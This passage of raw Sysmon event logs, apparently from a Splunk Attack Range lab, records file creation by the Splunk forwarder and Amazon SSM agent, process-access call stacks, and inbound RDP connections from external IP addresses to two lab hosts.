Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A3C56FF47F2424354BA7BAE93312C4A4,SHA256=C6BEA2E89FD74A86408A0A47F456DCFDD093156731D0A63E81F94A4EE0310DE9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977122Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:43.481{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-39476-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000977121Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:42.107{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com50521-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 10341000x80000000000000001048492Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:47.801{5EBD8912-7B3A-6151-3A78-00000000FC01}71203376C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048491Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:47.781{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D0EE1091CA13DF4B9B0D87652656C44,SHA256=5782C352DDAC0F976C5B06EF9C0FC63EE322C505B49DD0A2392E539B70913DE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977126Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:47.734{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADD214C1E8E9F3A1886E8C9D712B5D3C,SHA256=CEBECDD9A4FC32964D5EE6BD14FA58012938A552C85B9724EAD0F8DFA1D055BB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977125Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:44.467{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-57331-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977129Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:48.891{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=741CD439A6E290C4FA722D000F246B9A,SHA256=0340D3094242622FA4019A3286164C82E393A0BD0C1A6A76FB453D87C5660584,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977128Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:48.891{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1AB805B9275B8F28A4C435BCD8E0E5C,SHA256=3151D179EA4BCFAC0128D890FBD9E52F347E7F7C0D793147F7CCDE80CF33F2CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048494Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:48.800{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA399ECF272E412C1D2BB62E4349EA90,SHA256=5AA077193F7E871AD0BE0FBF22ACD109E03CAA3E126471D3686512518190A816,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048493Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:45.824{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53238-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000977127Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:45.945{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-60879-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977130Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:49.969{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EDEFF770321D37DC2E700B570AD45736,SHA256=C299FC179B0CB194DF2B4BD4FDAB72254424FCCC3A4EEC68FE3C0F22E018899E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048497Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:49.809{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44C1682283C33C89097E6D5C12536BB9,SHA256=29C4DD77391D92ADC9BCD15A5ACC5540EBF61F7C5405DAB7885743C356BF8998,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048496Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:46.842{5EBD8912-7F11-614D-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53239-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local445microsoft-ds 354300x80000000000000001048495Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:46.842{5EBD8912-7F11-614D-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53239-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local445microsoft-ds 23542300x80000000000000001048498Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:50.840{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22641DC6DCCF057A0E469BE86BA94D1A,SHA256=160516989D1A7E5F51DCF2DEF4B66D32AE3CF307E29EA87BCC3F21F478EFCEDF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977131Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:46.731{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-51764-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001048499Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:51.870{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61A31DC8C3655DA0DF74C97D7A91DE78,SHA256=7697CF1DAA6973EF727A49606B1F280B55C9FD5491769A06A415A75093E04B4E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977135Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:47.723{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59286-false10.0.1.12-8000- 23542300x8000000000000000977134Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:51.796{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8145CB72347BCF6BA5A30E995455067C,SHA256=88B6385F01241256B5DEF3FDFBA5578256BA6B8DFC2051C0509DBBD899F8C054,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977133Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:51.455{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\respondent-20210924073259-4300MD5=C03F5A35DCD33CC76F546E3EA7D3F3DF,SHA256=27CB325E5A2A8D6C4E4022C2FAED9138BDF4BFE7B38BDA6EB79267B7EDAE26D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977132Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:51.109{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BA9F7684EDD99ADA721AD31627D796C,SHA256=33D991C2A82009DBDDF48DC0E064636FBCE7F17E19BFBA9BD2B4011BB78F2B1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048500Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:52.872{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3BFA2B4E0CD0266F6E94BBE84CDD202,SHA256=5527D996EC2B117AA98744F12DB6CA7DC8F137E9A8188F20A1DBC1756214EB98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977137Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:52.469{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\surveyor-20210924073257-4301MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977136Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:52.156{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=762E938F934052C2804C6AB3FE10543B,SHA256=D03755E5A71A5BF9A97D2ACEE86B12E184CD280D9766A93DBC270B8E3E38F343,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048502Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:53.890{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA934115BE0508F7AD6C0E61DC55E28B,SHA256=343D61E448A2C61E1D964E08BFED7937CCC07433300BF8AC9CA0A5668CB04779,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977141Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:50.925{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-63859-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000977140Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:50.735{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-22848-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977139Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:53.766{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FC31A7F3639AC21FA4A158E760F8497F,SHA256=45AE4D96CDC6C60EBF965EF94A84A4D52A2D08E2884CA9C2E526D6076E2042BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977138Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:53.172{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8BB916373C0B4251E734B1E222FF460,SHA256=135531662F6B97BC053DA0109EAD038E9C5C2FDCAC212A2443BCFE89621EDF86,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048501Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:51.293{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de53426-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048523Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:54.925{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F6B43FCE5360F2A5653724D8C121188,SHA256=89AFB87B9D41E8EFCDB93BC7AF06D6FFF42F1EADBA89F82D86DB3FAA34963BC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977142Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:54.250{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DD27985A752029721C117B51135B23B,SHA256=BB2236141F2709551D9A8CE71BD2691BAE895B8CAE79DF36B14666908AFA9FC2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048522Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:54.756{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-88FA-6151-FE79-00000000FC01}5216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048521Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:54.756{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048520Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:54.756{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048519Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:54.756{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048518Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:54.756{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048517Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:54.756{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-88FA-6151-FE79-00000000FC01}5216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048516Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:54.756{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-88FA-6151-FE79-00000000FC01}5216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048515Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:54.726{5EBD8912-88FA-6151-FE79-00000000FC01}5216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001048514Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:54.272{5EBD8912-88FA-6151-FD79-00000000FC01}37521032C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001048513Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:51.730{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53240-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048512Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:54.093{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D81389242AA7F38B317DCD5727BD5593,SHA256=740A070D1720D9E140ED6C9A453C3D74C31BD8A4DB0EBAEC2F72375F91B7C70B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048511Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:54.093{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5A0DE72DEC3997BA255905E84869F057,SHA256=F31DEAB9A35A02930C5B8558AAA03D91FA89F15E9C66A361539782282EA41A23,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048510Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:54.056{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-88FA-6151-FD79-00000000FC01}3752C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048509Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 